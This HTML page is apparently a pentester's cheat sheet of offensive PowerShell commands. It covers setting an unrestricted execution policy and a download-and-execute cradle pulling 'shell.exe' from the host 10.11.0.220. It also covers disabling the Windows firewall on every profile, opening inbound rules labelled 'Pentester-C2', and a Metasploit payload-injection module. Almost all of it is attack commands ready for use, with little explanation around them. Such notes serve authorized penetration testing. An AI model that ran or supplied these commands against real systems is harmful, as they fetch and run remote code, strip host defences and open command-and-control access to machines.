<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Powershell</title>
</head><body>set-executionpolicy unrestricted<br/>
<br/>
<b>IEX (New-Object Net.Webclient).DownloadString(“http://10.11.0.220/shell.exe”</b>)<br/>
<br/>
<br/>
<b>Set-NetFirewallProfile</b> to Disable/Enable the Windows Firewall:<br/>
<br/>
<br/>
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False<br/>
<br/>
<br/>
<br/>
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True<br/>
<br/>
<b>New-NetFirewallRule</b> to add allow a specific IP address to connect:<br/>
<br/>
New-NetFirewallRule -Action Allow -DisplayName Pentester-C2 -RemoteAddress<br/>
<br/>
new-netfirewallrule -action allow -localport 80 -direction inbound -protocol tcp -displayname pentester-c2 &nbsp;<br/>
<br/>
<b>New-NetFirewallRule</b> to allow connections on a specific port:<br/>
<br/>
new-netfirewallrule -action allow -localport 80 -direction inbound -protocol tcp -displayname pentester-c2<br/>
<br/>
<b>Turning Meterpreter into PowerShell &nbsp;<br/>
<br/>
</b>post/windows/manage/payload_inject <b>&nbsp;<br/>
</b><b><br/>
</b></body></html>